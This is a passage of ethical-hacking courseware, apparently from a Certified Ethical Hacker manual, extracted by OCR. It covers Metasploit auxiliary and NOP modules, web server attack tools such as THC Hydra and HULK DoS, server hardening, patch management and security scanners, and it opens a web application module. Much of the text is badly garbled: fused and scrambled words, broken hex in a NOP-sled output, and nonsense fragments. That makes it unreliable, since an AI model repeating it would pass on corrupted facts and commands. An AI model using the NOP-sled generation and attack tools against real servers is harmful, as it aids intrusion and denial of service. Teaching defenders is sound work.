Auxiliary of Metasploit can be usedto perform one-offactions such
arbitrary,
as portscanning, DoS,and even fuzzing. It includestoolsandmodulesthat assess the
securityofthetargeta s well as auxiliary
modules suchas scanners,DoSmodules, and
fuzzers.The show auxiliary commandin Metasploit can be used to list all the
available
auxiliary
inMetasploit.
usedto exploit
modules
are auxiliary
exploitation.
All modules
modules.Metasploit
for various purposesother than
uses auxiliary
Auxiliary
other thanthe ones
i n Metasploit
modulesas an extension
modulesare stored i n the
modules/auxiliary/directory main directory.
of the framework’s The run commandor
the exploit command c an be usedto run an auxiliarymodule.
ical andCountermensores
Mackin ©by E-Comel
Copyright
13:42;
Figure Screenshot suxiarymodule
displaying commands
of Metasploit
require
of an auxiliary
Thebasicdefinition
'msf/core! isas
module follows:
p "MyAuxiliary Module―
class Metasploit3 < Msf: :Auxiliary
end # for the class definition
‘Metasploit
NOPSModule
NOP modulesgenerateno-operationinstructions usedfor blocking out buffers.The
generate commandc an beusedto generate
format.
i n a given aNOPsled of arbitrary
size anddisplayit
Options:
-b<opt>: to avoid("\x00\xft")
A listofcharacters
-h:Helpbanner
A comma separated
-s <opt>: listof registers
to save
-t<opt>:Theoutputtype(Ruby, Perl, or raw)
msf
nop(opty2)>
Thefollowing a NOPsledof a given length
commandis usedto generate
msf > use x86/opty2
ms£nop(opty2)> generate -h
Usage: generate [options] length
Thefollowing a 50-byte
commandis usedto generate NOPsled:
msf nop(opty2) > generate -t c 50
unsignedchar buf[] =
""\x24
\xb1
\xbe \x3f\x43\x1d\x93\
xb2\x37\x35\x84\xd
\x40\xb« x14
"
\xb3
xd
\x41 \xb9\x48\x04\x99\x46\x29\xb0\xb7\x2f\xfd\x96\xda\x98"
"\x92\xb5\ \x4f\x91";
ms£nop(opty2)>
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerAttackTools
Immunity's
CANVAS
web
atack
tectnoley
‘Web
ServerAttackTools
THCHye (tps //othub.com)
HULK
o s hete//thub com)
MPeck
tos/sourceforge.net
wa ht/fadaor)
WebServerAttack Tools
Immunity’s
CANVAS
Source:https://www.immunityinc.com
Immunity’s
provides
CANVAS penetration professionals
testers andsecurity with hundreds
of
exploits,
an automatedexploitation
system,anda comprehensive,
reliableexploit
development
framework.It provides
featuressuchas client-sideexploitation,
privilege
escalation,
HTTP
tunneledprivilege
escalation,
remote kernelexploitation,
advancedbackdoortechnology,
and
advancedwebattacktechnology.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
are some additional
webserver attacktools:
=
THCHydra(hetps://github.com)
=
HULKDoS(https://github.com)
=
MPack(hetps://sourceforge.net)
wat (http://w3af.org)
tical
Making
and by CountermensoresCopyright©
Comet
ModuleFlow
Concepts
WebServer WebServer WebServer WebServer
‘Attacks ttack ‘tack
e °e
Counter:
Patch
e
measures
WebServer
Management Security
‘Toole
Countermeasures
In previoussections, the benefits
we discussed of a well-informed
web server security
posture,
the danger
posed
byweb
server
attacks, the methodology
toolsthat assistan attackeri n performing
toolsand techniques
usedi n web
server
usedi n securing web servers. Thissection discusses
attacks,
andthe
webserver attacks.In this section,w e discuss
the
various methodsto
detectwebserver attacks,
countermeasures, anddefense techniques.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PlaceWebServersin Separate
SecureServerSecurity
Segmenton Network
hosting
network
|GAndes! web
a should
securebe
server
scutity wit
atone
called (DMZ),
segment fen
designed
odie
east thresegments an
namely, nternet
ad en nero network
segment,
“a
Thee
Server
server
Segment
shouldbeplaced
pul andintrnalnetworks
i n the Secu [OMZ) ofthe elated am the
network,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures:
Patchesand Updates
OD
nce eres
paints ose
cn aDanan
non-production
repretentatve environment ‘operations
maintenance and tr to never have
Scanforexisting
‘=
patch
vulnerabilities; andupdate regularly.
the server software
Before applying any service pack,
hotfix, patch,
or security readandpeer review all
relevantdocumentation.
Applyall updates, regardless
of their type, on an “as-needed―
basis.
Testservice packs andhotfixeso n a representative non-production environment prior
to deployment i n production.
hotfixes,
Ensurethat service packs, andsecurity patchlevelsare consistenton all
domaincontrollers(DCs).
Ensurethat server outagesare scheduled andthata complete set ofbackup tapesand
emergencyrepair disksare available.
Keep a back-out planthat allowsthesystemandenterprise to return to theiroriginal
state,prior to a failedimplementation.
periodic
‘Schedule service-pack upgradesas partofoperations maintenance andnever
trail bymore thantwo service packs.
Disable all unusedscriptextension mappings.
usingdefaultconfigurations
‘Avoid that web servers are dispatched with.
Usevirtualpatches i n the organization
because theyprovide additional
identification/logging
capabilities.
a disasterrecoveryplan
Establish to handlepatch failures.
management
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures:
Protocolsand Accounts
propriate leatposible)
to
the permisions
NTFS
habe
WebOY
te not dy apatin or
pesthen sos
exourd ane parm
Countermeasures:ProtocolsandAccounts
Countermeasures:
Protocols
following
‘The are various protocols
countermeasures for usingsecure
on web servers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disable
unuseddefaultu ser accountscreatedduringthe installation
ofan OS.
a new web root directory,
Whencreating grantthe appropriate (leastpossible)NTFile
System(NTFS)
permissionsto anonymous users of the IISweb server to access the web
content.
Eliminateunnecessarydatabaseusers andstoredprocedures
andfollowthe principle
of
leastprivilege
forthedatabaseapplicationto defend SALquerypoisoning.
against
Usesecure web permissions,
NTFSpermissions,
and .NETFrameworka ccess control
mechanisms
URL
including authorization
Slow down brute-force
and dictionary policies,
attackswith strongpassword and
implement
and failures.
audits alertsfor login
Runprocessesusing leastprivileged
accountsas well as leastprivileged
service and user
accounts
Limit the administratoror root-level access to the minimum numberof users and
a ofsame.
maintain record the
of
Maintain logsall
on in
an
encrypted
user
machine theintranet.
activity formon thewebserver
orin a separate
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures:
Files and Directories
sensitive
configuration
Eliminate
withinthebytecoee infomation
‘ns
recor
||
msg wean no seeing
crane psy cere
SOL
Merosot Serer MySOX e weite
fies
ond
‘dv the on system
septs aseparatepartion
than hat oftheoperating
Countermeasures:Files andDirectories
Thefollowing
countermeasurescan beadopted
for securingfilesanddirectorieso n a web
server.
Eliminate
=
unnecessary
filesjar
within files.
Eliminatesensitive configuration
informationwithinthe bytecode.
=
Avoid mapping virtualdirectoriesbetweentwo differentservers or over a network.
Monitor andcheckall networkservices logs,
websiteaccess logs,
databaseserver logs
(e.g,MicrosoftSQLServer,MySQL, andOracle), andOSlogs frequently.
of
Disablethe serving directory
listings.
Eliminatenon-webfilessuchas archivefiles,backup
files,text files,and header/include
files.
of
Disablethe serving certain file typesbycreating
Ensurethat web applications
a resource map.
or websitefiles and scriptsa re stored i n a partition
or
driveseparatefromthatoftheOS,logs, andanyother system files.
Runtheweb server within a sandboxdirectory forpreventing accessto system files.
Avoidall non-webfile typesfrombeing
referencedi n a URL
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerHacking
Detecting Attempts
|G Usea Websitechange to detect
DetectionSystem hacking
attemptsonthe
web
sever
peti
fanning
xipt
on
the server tht detects
ay made
chinges eet
nthe existing l eo new e eed
WebServerHacking
Detecting Attempts
‘An
attackerwho gains access to a web server by compromising security
through
known
vulnerabilities
presenti n the web server may attemptto plantbackdoors(scripts).
These
backdoors allowthe attackerto gainaccess, launchphishing
attacks,or sendspamemails.The
victim remains unaware of thewebserver attackuntiltheserver is blacklisted o n spam mails
or
Untilthe attackerredirectsthe visitors of a targetsite hostedon theweb server to some other
site, Thus, a web server attackis difficult to detectunless
suchmaliciousevents occur. Bythe
time theseevents occur, it maybe too late to react because the attackerwouldhave already
succeeded. Therefore, a mechanism to detecta webserver hacking attempti n its early
stagesis
required to prevent harmto the webserver.
Whenan attackerinstallsa backdooron a web server, the size of files infectedwith the
backdoorautomatically increases. A website change detection system(WDS) is a scriptthat
runs on the server to detectchanges madeto any executablefile or the presenceof any new
file o n the web server, suchas HTML, JavaScript(JS),PHP, Active Server Pages(ASP), Perl,and
Python files.It worksbyperiodically comparingthe hashvaluesof the fileson the server with
their respective master hashvaluesto detectany changes to the codebase. If it detectsany
change on the server, it alertsthe user to take necessary action. Thus,W S helps i n detecting
‘webserver hacking attemptsi n the earlystages of an attack.For example, Directory Monitor is
an automatedtool that goesthrough entire webfolders, detectsany changes madeto the
codebase,
and
alerts the user through an email
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defend
Against
Web
ServerAttacks
©
reply
ua on
te ports
data
range
ate
valid
ang
ensure hat © rare thatceria thatthe
Lin inbound
forrest) 80
wae to port forHTTP
and port ertieat'
‘ootathe
publ key vail he way 3 uted
|
How to Defend Against
Web Server Attacks (Cont'd) CEH
sr
Module3 1681
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
How to Defend
Against
WebServerAttacks(Cont'd)
avoidattacks.
are
some
suchMITM
ofthem. Thefollowing
©. Usethe directvalidationof certificates.
© Usea novelprotocol on thirdparties
that doesnot depend forcertificate
validation,
Allowdomainsto directly examine their certificates
and securely byusingpreviously
established
user authentication
credentials.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usea robustcryptographic construction thatenhances validation
server identity and
resolves
of
the limitations third-party solutions.
Ensure that the certificatedata rangesare valid andthat certificatesare usedfor
theirintendedpurpose.
public
Ensurethat the certificatehasnot beenrevokedandthat the certificate’s key
is validallthe wayto a trustedroot authority,
Machine.config
The machine.configfile provides a mechanism of securinginformationbychanging
machine-level
settings. It affectsall other applications,
Themachine.configfile includes
for the .Netframework,
machinesettings Thefollowing
whichaffectthe security. can be
with the machine.config
performed file:
© Ensurethat protectedresources are mapped
to HttpForbiddenHandler
and that
unusedHttpModulesare removed
CodeAccessSecur
Thefollowing
measurescan be adopted
to ensure codeaccesssecurity
© Implement
secure coding to avoid source-code
practices disclosureand input
validationattacks.
© policy
Restrictcodeaccesssecurity settings
to ensure thatthereare no permissions
to execute codedownloadedfromthe Internetor intranet.
Configure
IIS to rejectURLswith "../" to preventpathtraversal, lockdownsystem
and utilitieswith restrictive accesscontrollists(ACLs),
‘commands and installn ew
©
patchesandupdates.
implement
If targets
do not codeaccess securityi n theirweb servers, thenthere is a
possibility
of execution ofmaliciouscode,
following
‘The are some othermeasuresto defendagainst
web server attacks.
=
Apply
restrictedACLsandblockremote registry
administration,
Secure the SAM(stand-alone
servers only)
‘=
Ensurethatsecurity-related a re configured
settings andthat accessto the
appropriately
metabasefile is restrictedwith hardenedNTFSpermissions.
Remove unnecessaryInternet Server Application Interface(ISAPI)
Programming filters
web
fromthe server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
filesharesincluding
Removeall unnecessary if they
thedefaultadministrationshares,
are not required.
Securethe shares
with restrictedNTFSpermissions,
Relocatesites and virtual directories partitions and use IIS web
to non-system
permissionsto restrict access.
Remove all unnecessary 11Sscriptmappingsfor optional file extensions to avoid
ofanybugs
exploitation i n the ISAPI
extensionsthat handlethesetypesoffiles
Enablea minimum levelof auditing on the web server and use NTFSpermissions to
log
protectfiles
Usea dedicated
machineas a webserver.
to internalservers cautiously
CreateURLmappings
Donot installthe IISserver on a domaincontroller.
Use server-sidesession ID tracking
and match connections with timestamps,
IP
addresses,
ete,
If a databaseserver,suchas MicrosoftSQL
Server,
is to beusedas a backenddatabase,
installit on a separate
server.
tools provided
Usesecurity with webserver software
andscannersthat automate and
the aweb
simplify processof securing server.
Physically
the
protect webserver machinei n a secure machineroom
Donot connect an IlsServerto theInternetuntilitis fullyhardened.
Donot allowanyoneto locally
login to themachineexcepttheadministrator.
Configure anonymoususer account for eachapplication,
a separate if multiple
web
applicationsare hosted.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defend against
HTTPResponse-Splitting
andWeb
CachePoisoning
© Regular updat/pate
the
OS and
wed server
ProxyServers
se aferet TCP
connactonswith theron for ferent vital hosts
Server
©.
Admin
Usethelatestwebserver software
©
update/patch
Regularly theOSandweb server
Runa web vulnerability
scanner
Restrictthewebapplication's
accessto uniqueIPs
Disallow
Comply with RFC
or
\r} for
CR(360d andLF(960a
or \n)characters
2616specifications HTTP/1.1
Parseall user inputsor otherformsof encoding
beforeusing themi n HTTPheaders
ical andCountermensores
Mackin ©by E-Comel
Copyright
Proxy Servers
Avoid sharing
different
incomingTCPconnectionsamor clients
©
9
UsedifferentTCP
Implement
“maintain
with
thefor
connections proxy different virtualhosts
correctly
requesthostheader―
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
DNSHijacking
EBssesvars eptrant
the account information
the
onthedomain
Reptrat-Lack ose name
EB ence ons
ijcting dent responded
it contin planing
busines
HED
stan ants prog andtet reguay
How to Defendagainst
DNSHijacking
Thefollowing
techniquesbeusedto defendagainstONShijacking
can
up alerts,
downloading
‘Avoid audio and video codecsand other downloadersfrom untrusted
websites
Change
an
Install antivirus programandupdate
the defaultrouter password
it regularly.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Configuring
a Master-Slave
DNSwithinyour Network:Usea master-slave
ONSand
configure
the master without Internet access. Maintaintwo slaveservers so that even if
an attacker
hacksa slave, it will update onlywhenit receives an update fromthe
master.
Constant Monitoring
of DNSServers: Theconstant monitoring
of DNSservers ensures
a
that domainname returns the
EnsureRouterSafety:Change
correct
IPaddress.
the default username and passwordof the router. Keep
up to datefor ensuringsafety
thefirmware fromnew vulnerabilities.
UseVPNService:Establish virtual privatenetwork (VPN)-encryptedtunnelsforsecure
privatecommunication over the Internet. This feature protectsmessages from
and
‘eavesdroppingunauthorizedaccess.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Patch WebServer
Management Security
‘Tools
Patch Management
Developers
always
i n the formof patches, to
attempt findbugs
i n a web server andfixthem.Bug
whichprovide protection against
fixesare distributed
knownvulnerabilities.Unpatched or
vulnerablepatches
role of patches,
guidance
upgrades,
for choosing
loophole
can create a security i n thewebserver.
This
section describes
the
and hotfixesi n securing web servers. Thissection also provides
proper patches,upgrades, andtheir appropriate
hotfixes, sources for
secure patch
management.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Patchesand Hotfixes
theperformance
af
computerprogram
rts
supporting data
benotifiedtroughemails
Users may or thevendor's
through website
problem
_patehcanbeconsideredas a repaijb for«programming
Motfngs
ae sometimes
package
2s
a
set offb called a combined
hotfixor servicepack
PatchesandHotfixes
A patch is a smallpiece of softwaredesigned to fix problems, security vulnerabilities,
and bugs
aswellas improvethe usability or performance of a computer programor its supporting data.A
patchc an beconsidered a repairjobfor a programming problem. A softwarevulnerability is the
weakness of a softwareprogramthat makesit susceptible to malwareattacks. Software
vendorsprovide patchesthat preventexploitations and reducethe probability of threats
exploiting a specific vulnerability.
Patchesincludefixesandupdates for multiple knownbugs or
issues.A patch i s a publicly
releasedupdate that is availablefor all customers.A system without
patches is muchmore vulnerableto attacksthan a regularly patched system.If an attackercan
identifya vulnerability before it is fixed,then the systemmightbe susceptible to malware
attacks.
Ahhotfixis a package
usedto address
a criticaldefecti na live environmentandcontains a fix for
asingle
i ssue.It
a product
version.
updatesspecific
that the issues are resolved.Apply quick Hotfixesprovide solutionsandensure
hotfixesto softwarepatches on production
systems.
Vendorsupdate users aboutthe latesthotfixes throughemailor makethem available o n their
officialwebsite.Hotfixesare updates that fix a specificcustomer issue and are not always
distributed
outsidethecustomer organization. occasionally
Vendors deliverhotfixesas a set of
fixescalleda combinedhotfixor service pack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is PatchManagement?
| “Patch
onaprocess
management
ateinsaled
ea
system
used byensuring
t o ixknownvulnerabilities thattheappropiate
patches
An automatedpatch
management
process
Detect
| @ Usetoolstodetectmisingsecrtyptches
| Asses
‘Raseas@
the
sels
asosated
severities
thethat
may
the
and factors
bymitigating een declan
Require
| thepatch
| Dowroud foresing
‘Test
| machine of
the
Intal thepach
fat on testing to vey theconsequent update
Deploy |
te and tha
the
©Deploy atcto he computersensre aplatoneae notacted
the=
tasks:
following
Choosing,
verifying,
testing,andapplying
patches
*
Updating
previously
applied
patches
with current patches
Listing patches
applied
previously
to the current software
Recording repositories
or
Assigninganddeploying
depots
easyselection
of patches
the applied
for
patches,
automated
‘An
+
patch the
following
management processincludes
patches.
Detect:Usetoolsto detectmissingsecurity
steps.
=
Assess: issue(s)
Assesthe by
andits associated thefactorsthat may
severity mitigating
thethe
influence
‘Acquire:
decision,
patch
Download fortesting
Test:Installthe patch
Deploy:
Deploy thepatch
of
first on a test machineto verify
to computers
the consequences the update.
andensure that applications
are not affected.
Maintain: Subscribeto receive notificationsabout vulnerabilitieswhen theyare
reported.
Module3 Page1694 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Installationof a Patch
enstying
Apps ltation
ota
tor Updater and
Pateh Patch
or
andPate
ImplementationVeriict
security Upgrade
ay
path,
(& Fest makepatchmanagement Userscancco ad ital eecunty Before
intaing veri
Bites
updates proper
patch Patches ©Usea
an dbeinsaledintwoways managment
o d oporoptate
re
Scns ey nt Mana astatation ety
tptAuto
Update
featur managemen
Issuesrelevant
to proactive te the The patch team
peter ith
be tumors
Installation of a Patch
Identifying
a
Theinstallationof patch
entailsthe following
Appropriate
Sources
tasks.
for UpdatesandPatches
Itis important to identifyappropriate sources for updates and patches. Patches and
updates that are not installedfromtrustedsources can renderthe targetserver even
more vulnerableto attacks, insteadof hardening its security. Thus, the selectionof
appropriatesources for updates andpatchesplays a vital rolein securing web servers.
The following are some methodsfor identifying appropriate sources for updates and
patches.
© Createpatch
a
objectives. plan
fits
managementthat theoperational environment business
and
updatesand patches
Findappropriate on the homesites of the applications
or OS
vendors.
methodof tracking
Therecommended patching
issues relevantto proactive is to
register to thehomesitesto receive alerts.
Installation
a
of Patch
Usersc an accessandinstallsecurity patches via theWorldWideWeb.Patches c an be
installed i n two ways.
© Manual Installation
In thismethod, the user downloadsthe patch fromthe vendorandinstallsit.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Installation
‘Automatic
In thismethod,
applications
usean auto update featureto updatethemselves,
‘=
Implementation
9 Beforeinstalling
any patch,
of
andVerification a Security
verify
the source.
Patchor Upgrade
ical andCountermensores
Mackin ©by E-Comel
Copyright
PatchManagement
Tools
GFT tancursspate
stately
scat let
management yur eter Symantec Management
PatchManagement
Tools
+
GFlLanGuard
Source:https://www.gfi.com
TheGFl LanGuardpatch management softwarescans the user'snetworkautomatically
as well as installsand manages securityand non-securitypatches.It supports
machines
across Microsoft®, MAC OS X°, and Linux®operating as well as manythird
systems,
partyapplications. It allowsauto-downloads of missingpatches rollback,
as well as patch
resulting i n a consistentlyconfiguredenvironment that is protected fromthreatsand
vulnerabilities
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘The
of
Gl13.45:Screenshot LanGuard
Figure
areadditional
followingsome patchmanagement tools:
software
patchmanagement
=
Symantec (https://www.symantec.com)
ClientManagement
Suite
=
Solarwinds (https://www.solarwinds.com)
PatchManager
=
Kaseya PatchManagement(https://www.kaseya.com)
SoftwareVulnerability
Manager(https://www.flexerasoftware.com)
forEndpoint
IvantiPatch Manager (https://www.ivanti.com)
Module3 1695
Page
©
1 countermensreCopyriht y -Comell
ModuleFlow
Concepts
WebServer WebServer WebServer
‘Attacks ‘Rttack
Patch
Management
WebServer
Security
Toole
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication Scanners
Security
and web |
testing application aWabag
|Ingmar
‘yhuct
yr to automate
helps ecurty
|
Sphuntitybia quardtheorgniaten'swebinfastuctre N-talkerx
Sane’
WebApplication Scanners
Security
+
syhunt
Hybrid
Source: http://ww.syhunt.com
TheSyhunt Hybridscanner automateswebapplication testing
security andguardsthe
organization's
web infrastructureagainstweb applicationsecuritythreats. Syhunt
Dynamic crawlswebsitesand detects XSS,directory transversalproblems, fault
injection,SQLinjection,attemptsto execute commands,and severalother attacks.
Syhunt Hybrid to detect application
creates signatures vulnerabilitiesand prevents
logout.
It analyzes (JS),
JavaScriptlogs
suspicious andtestserrors for review.
responses,
ical andCountermensores
Mackin ©by E-Comel
Copyright
N-StalkerX
13.46:
Figure Screenshot
Hybrid
of Shunt
websecurity
appiation scanner
Source:https://www.nstalker.com
N-Stalkeris a web application securityscanner that searchesfor vulnerabilitiesto
attackssuchas clickjacking, SQLinjection, andXSS.It allowsspider
crawling throughout
the applicationandthe creation of web macros for formauthentication.It alsoprovides
proxycapabilities for “drive-thru―
attacksand identifiescomponents through reverse
proxiesthat distributedifferentplatformsi n the same application
URL.
ical andCountermensores
Mackin ©by E-Comel
Copyright
might
tobe
‘Application
‘vulnerable
Clehjacking
attacks
Thefollowing
are some additionalweb application
of x
Fgure13.47:ScreenshotWtalkor
security
scanners:
‘*
(https://www,netsparker.com)
Netsparker
=
Burp (https://www.portswigger.net)
Suite
=
(http://wapiti.sourceforge.net)
Wapiti
+
(https://www.owasp.org)
Webscarab
Sec (https://wpsec.com)
TinfoilSecurity
(https://wuvw.tinfoilsecurity.com)
Skipfish
(https://code
google.com)
Detectify
(https://detectify.com)
Fortyon Demand(hetpsi//www.microfocus.com)
OWASP (ZAP)
ZedAttackProxy (https://www.zaproxy.org)
(https://www.sonarqube.org)
SonarQube
Arachni(https://www.arachni-scanner.com)
w3af(http://w3af.ora)
Grabber(http://rgaucher.info/beta/arabber)
(https://subgraph.com)
Vega
Module3 1700
Page tical MakingandCountermensores
by
Copyright©
Comet
WebServerSecurity
Scanners
ScanMyServor
Stanwy
Fenven
Testof
Your
or
tne Sacuty Waste BlogFree
WebServerSecurity
Scanners
=
ScanMyServer
Source:https://www.scanmyserver.com
is usedto find security
‘ScanMyServer vulnerabilitiesi n a website
or webserver. It can
comprehensive
generate test reportsand assistin fixing problems
security that might
exist i n a company’s
websiteor web server.
Stanmy[9
FEERVER
me
‘Test
the of Your Website
Security
13.48:Screenshotof SanMyserver
Figure
=
Qualys
are
Thefollowingsome additional
webserver security
Edition(hetps://www.qualys.com)
Community
scanners:
+
(https://observatory.
Observatory mozilla.org)
Scan(https://hackertarget.com)
WordPressSecurity
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
=
Web Scanner
Vulnerability (https://pentest-tools.com)
(https://cirt.net)
Nikto2
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerMalwareInfection Monitoring
Tools
Guatrsouard
WebServerMalware InfectionMonitoring
Tools
=
QualysGuard
MalwareDetection
Source:https://www.qualys.com
QualysGuard to proactively
MalwareDetectionallowsorganizations scan theirwebsites
for malwareand provides automatedalertsand in-depth reportingto enableprompt
identificationandresolution.It enablesorganizations their customers from
to protect
malwareinfectionsandsafeguard their brandreputation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
13.49Screenshot
Figure of QualysGuard
Malware
Detection
Theare
some malware
following additional
web server infectionmonitoring
tools
=
=
Sucuri (https://sucuri.net)
SiteCheck
(https://www.sitelock.com)
SiteLockSMART
©
Quttera(https://www.quttera.com)
(https://www.webinspector.com)
WebInspector
(hetps://www.siteguarding.
SiteGuarding
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerSecurity
Tools
WebServerSecurity
Tools
+
FortfyWebinspect
Source:http://www
microfocus.com
FortifyWebInspect is an automateddynamic testingsolutionthat discovers
configuration
issuesaswell as identifiesandprioritizes vulnerabilitiesin running
security
applications,
It mimics real-worldhacking
techniques
and provides
a comprehensive
dynamicanalysis
of complex
webapplications
andservices. Webinspectdashboardsand
reportsprovide with visibility
organizations and an accurate risk postureof its
applications.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1350:Sereenshot
Figure of FortyWeblnspect
Thefollowing
are some additionalweb server security
tools:
=
AcunetixWebVulnerability (https://www.acunetix.com)
Scanner
Retina Scanner(https://www.beyondtrust.com)
Host Security
‘=
SecureConfiguration
Neti@ (https://www.netig.com)
Manager
Suite(https://www.carson-saint.com)
SAINTSecurity
x
Interceptfor Server(https://www.sophes.com)
Sophos
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerPenTesting
Tools
‘Web
Test
Server Pen
‘Toole
WebServerPenTesting
Tools
+
Impact
CORE
source: https://uww.coresecurity.com
COREImpact i n an organization's
findsvulnerabilities webserver. Thistool allowsa user
to evaluatethe security
posture of a web server byusingthe same techniques currently
employed bycyber criminals.It scans for possible vulnerabilitiesi n the web server,
importsscan results,and runs exploits to test the identifiedvulnerabilities.It can also
scan network servers, workstations, firewalls, routers,and various applications for
Vulnerabilities;identifywhich vulnerabilitiespose real threats to the network;
determinethe potential impactof exploited vulnerabilities;and prioritizeand execute
remediationefforts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
of
CORE
Impact
gute 13.51:Sereenshot
are some additional
webserver pen testingtools:
=
Immunity (https://www.immunityine.com)
CANVAS
=
Arachni(https://www.arachni-scanner.com)
=
WebSurgery
(http://sunrisetech.gr)
Module1 3Page
1708 tical andCountermensores
Making by Comet
Copyright©
Module Summary
Inthis
madue,
dcutted we have the following
byteat actors
attempts
atch management
concepts
Detaledeiscusion on web servers using
securing tols
various security
nthe
pen next
wil
web
module,we
testers,
hack
discussi n deta how attackers,
apoiations
aswell a s ethicalhacers and
Module Summary
In thismodule, we discussed in detail generalconceptsrelatedto web servers; various web
server threatsand attacks;the web server attack methodology, whichincludesinformation
gathering,webserver footprinting,websitemirroring,vulnerability
scanning,sessionhijacking,
and web server passwords hacking; and various web server hackingtools. Additionally,we
discussed various countermeasures that can be employed to preventweb server hacking
attemptsbythreat actors.We alsodiscussed patch
management concepts.Thismoduleended
with a detaileddiscussion
on howto secure webservers usingvarious securitytools.
In the next module,we will discuss
in detailhowattackers,as well as ethicalhackers
andpen
testers,hackweb applications,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Certified
| Ethical Hacker
& Module14;
~
inlelel
diate
MUM-loW\o}e)iex
Module Objectives
Module Objectives
evolutionof the Internet andweb technologies,
‘The combinedwith rapidly increasingInternet
hasled to the emergence
connectivity, of a new businesslandscape.
Webapplications are an
integral
component
web applications
networking
of
online businesses.Everyoneconnectedvia the Internet is usingvarious
for differentpurposes,including emall,chats,
online shopping, andsocial
Webapplications
are becoming
increasingly
vulnerableto more sophisticated
threatsand
attackvectors. Thismodulewill familiarizeyou with various web applications andwebattack
vectors as well as how to protect an organization's informationresources from them. It
describes the general
web application
hacking methodology that most attackersuse to exploit
a
targetsystem.Ethicalhackerscan use this methodology to assess their organization’s
security
againstweb applicationattacks.Thismodulewill alsofamiliarizeyou with web API,webhooks,
andwebshellconcepts as well as hacking.In addition,
it discusses severaltoolsthat are useful
in different ofwebapplication
stages security
assessment.
will to:
At theendof thismodule,you beable
+
Describe
Perform
application
web
application
various web
concepts
attacks
=
Use
the
web hacking
Describe application
different
methodology
hacking
webapplication tools,
Explain
web API,webhooks,andwebshellconcepts
Understand
via
how to hackweb applications
web API,webhooks,
andwebshells,
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
=
Adoptcountermeasures
against
web
application
attacks
Usedifferentweb application testingtools
security
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Application
‘Web Concepts Hacking
Methodology
oe oe
Application
Web Threats
Web
ADL,abo,
———_—_=[[_
:
»-_—
=
‘Web
ApplicationSecurity
—=<« f°
Web Application
Concepts
Thissection describes
the basicconcepts
associated with webapplications
vis-8-vis security
concerns—their
components, how theywork,their architecture,
and so on. Furthermore, it
provides
web
services
vulnerability
insightsinto and stacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
Introductionto WebApplications
\Web an interface
provide
a pplications between
endusers andwebservers through
ast ofwebpagesthatare
webapplications
Though enforce
certain
security
polices,
to theyare vulnerable
various attackssuch
9s SOL
How aa:
Applications
Web =
Introduction to WebApplications
Webapplications are softwareprograms that run on web browsers and act as the interface
betweenu sers andwebservers through web pages.They enablethe usersto request, submit,
and retrieve data to/froma databaseover the Internet byinteracting through a user-friendly
graphical user interface(GUI).
Userscan inputdatavia a keyboard, mouse, or touchinterface
depending on the devicetheyare usingto access the web application. Basedon browser-
supported programming languages suchas JavaScript, HTML, andCSS, web applicationsworki n
combinationwithother programming
Webapplications are developed
languages
as dynamic
to
suchas SQL accessdatafromthedatabases
web pages,and theyallow users to communicate
with servers using server-sidescripts.They allow users to perform specific
taskssuchas
searching, sending emails,connecting with friends,onlineshopping, and tracking and tracing,
Furthermore, there are severaldesktop applications that provideusers with the flexibility
to
workwith the Internet,
Entitiesdevelop various web applications to offer their services to users via the Internet.
Whenever users need to access suchservices, theycan requestthem bysubmitting the
UniformResource Identifier (URI)or UniformResource Locator(URL) of the web application in
a browser.
Thebrowser passes thisrequestto theserver, whichstores thewebapplication data
and displaysit in the browser.Somepopular web servers are Microsoft11S, Apache HTTP
Server,H20,LiteSpeed, Cherokee, etc.
Increasing
Internet usageand expanding have accelerated
onlinebusinesses thedevelopment
and ubiquity
of web applications
across the globe.A keyfactor i n the adoption
of web
applications
forbusiness thattheyoffer.Moreover,
purposesi s the multitudeoffeatures they
are secure and relatively In addition,
easy to develop. theyoffer better services than many
computer-based
software
applications
are
easy
install,
andand to
ical
maintain, update.
andCountermensores ©
Mackin by E-Comel
Copyright
advantages
‘The ofwebapplications
are listedbelow:
=
As they are independent of the operatingsystem,their development
and
troubleshooting
are easyandcost-effective.
Theyare accessible
anytimeand anywhere
using a computerwith an Internet
connection,
making
Theuser interfaceis customizable, it easyto update.
Userscan access themon any devicehaving including
a n Internet browser, PDAs,
smartphones,
etc.
servers, monitoredand managed
Dedicated byexperienced
server administrators,
store
web allowing
Multiple
developers
allthe application
their
data,
locationsof servers not
increase workload
to
onlyincrease physical
capacity.
but alsoreducethe
security
burdenof monitoring
thousands of desktops
usingthe program,
They
u se flexiblecore technologies,
suchas JSP,
Servlets, SQL
Active ServerPages,
Server, languages,
.NET,and scripting which are scalableand supporteven portable
platforms.
Although enforcecertain securitypolicies,
web applications theyare vulnerableto various
